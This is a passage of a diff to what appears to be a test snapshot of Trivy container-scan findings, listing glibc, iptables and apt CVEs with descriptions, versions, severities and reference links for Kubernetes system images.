"value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://ubuntu.com/security/notices/USN-4954-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "iptables", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "libapt-pkg6.0", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", @@ -77088,7 +79086,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ @@ -77165,540 +79163,473 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", - ], - }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - 